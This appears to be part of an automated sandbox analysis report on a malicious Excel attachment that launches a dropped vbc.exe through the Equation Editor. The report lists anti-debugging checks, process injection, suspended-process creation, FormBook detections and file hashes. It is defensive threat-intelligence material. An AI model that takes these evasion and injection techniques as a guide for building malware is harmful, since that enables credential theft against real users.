Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306B7B4 mov eax, dword ptr fs:[00000030h]	4_2_7306B7B4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306B686 mov eax, dword ptr fs:[00000030h]	4_2_7306B686

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 1C0000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior

Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

4_2_0040312A

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

ID:	491746
Product:	CloudBasic
Start time:	21:07:28
Start date:	27.09.2021
Sample:	ORDERCONFIRMATION_00001679918.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	9c34f5c5e1a78c24947c3fe5fce601ea
SHA1:	727aa4c09c4c4f40d47ba87fa91921876b79f0f3
SHA256:	ff1168daa5edebf6c75a6f24573e0b1e8153156b47e9c91712f8aa7968d745db
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	A9DCC61F31601E771050463C4D41CDB0	C26979F1842C9F2460FC9E0F9285266B0D175B49	E018D5F9CE45E81A96459FA0C717DF76B2D765F24A9A472AD2CB8D13B523F562
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1692293F.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 509x209, frames 3	9984958CFC3A96E32DD6042DD14440DB	ABC82F6AB5C1D7C8BA0CDF10CFDC1F1916F58630	65EC42573985A8CDA90B901C23F8ECE366493301ADDB12ED0B86F4CD3A48756D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C3144A5.png	PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced	22335141D285E599CDAEF99EABA59D5B	C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D	6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\286302FB.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3	50B23CFD2E093C27B7624BB70EF7A825	788949A19E6CD30ABD7BE309A513F3D21CFC3064	BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36E70CB6.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3	50B23CFD2E093C27B7624BB70EF7A825	788949A19E6CD30ABD7BE309A513F3D21CFC3064	BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\608AFF49.png	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced	613C306C3CC7C3367595D71BEECD5DE4	CB5E280A2B1F4F1650040842BACC9D3DF916275E	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69023234.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\727091C1.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3F73A62.png	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced	613C306C3CC7C3367595D71BEECD5DE4	CB5E280A2B1F4F1650040842BACC9D3DF916275E	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CABA28C0.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 509x209, frames 3	9984958CFC3A96E32DD6042DD14440DB	ABC82F6AB5C1D7C8BA0CDF10CFDC1F1916F58630	65EC42573985A8CDA90B901C23F8ECE366493301ADDB12ED0B86F4CD3A48756D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1B73268.png	PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced	22335141D285E599CDAEF99EABA59D5B	C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D	6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F76D3143.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	5766BE17816555642884E7C47E05A022	A04119A2200394234A44DA920D3EAF69B6448897	76DAA4C2E93071BF16CCA081139786ED3C0B4143AF3D146BAAA98FC6EFCE1944
C:\Users\user\AppData\Local\Temp\9rvscd0j0b4n1ow	data	F817F157A6262B51A43656375EF8963C	F95D2338451B2259E6226A89360132108AB44E96	8B49F9768520B9B451F1B5A0A4817A75C4411852DC24DEDA95BF6A8AB965DDED
C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	8F1756B3FECE1D28C57CABFF0FDA9AB1	1D81CB4C36DA87BEE907656F9E77B1E5B159B3F0	65EFE70F4FEAE095EA7A9497007F2307F49572A8878AC5D304B66DD3AC0DDFB0
C:\Users\user\Desktop\~$ORDERCONFIRMATION_00001679918.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	A9DCC61F31601E771050463C4D41CDB0	C26979F1842C9F2460FC9E0F9285266B0D175B49	E018D5F9CE45E81A96459FA0C717DF76B2D765F24A9A472AD2CB8D13B523F562

Windows Analysis Report ORDERCONFIRMATION_00001679918.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs